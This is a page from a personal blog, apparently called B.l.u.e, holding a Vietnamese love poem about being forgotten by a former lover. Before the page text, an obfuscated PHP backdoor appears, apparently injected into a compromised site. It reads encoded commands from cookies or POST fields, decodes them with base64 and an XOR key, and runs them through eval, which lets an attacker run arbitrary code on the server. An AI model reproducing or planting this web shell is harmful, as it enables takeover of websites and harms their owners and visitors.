$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Một chút thẫn thờ, một chút em… – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Một chút thẫn thờ, một chút em…

Lonely

Rồi cô ấy, ngày nào đó sẽ quên tôi
Kỉ niệm về tôi sẽ chỉ như hạt bụi
Thổi nhẹ nhàng rồi tàn lụi…
giữa hư vô

Rồi một ngày, trong những câu chuyện của cô
Khi chiều tàn, ngồi quây quần bên đám bạn
Sẽ là về một gã trai nào với lời tỏ tình lãng mạn
Một cuộc tình mới…
kể từ tôi

“Kể từ tôi”,
dù thời gian có trôi
Tôi lớn khôn hơn, giỏi giang và tài ba hơn, ừ có thể
Chỉ có một điều tôi biết là không thể
Quên đi ba từ “kể từ tôi”

Kể từ tôi…
là mãi mất đi một làn môi
Của một thời,
Hoa đỏ
Kể từ tôi…

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.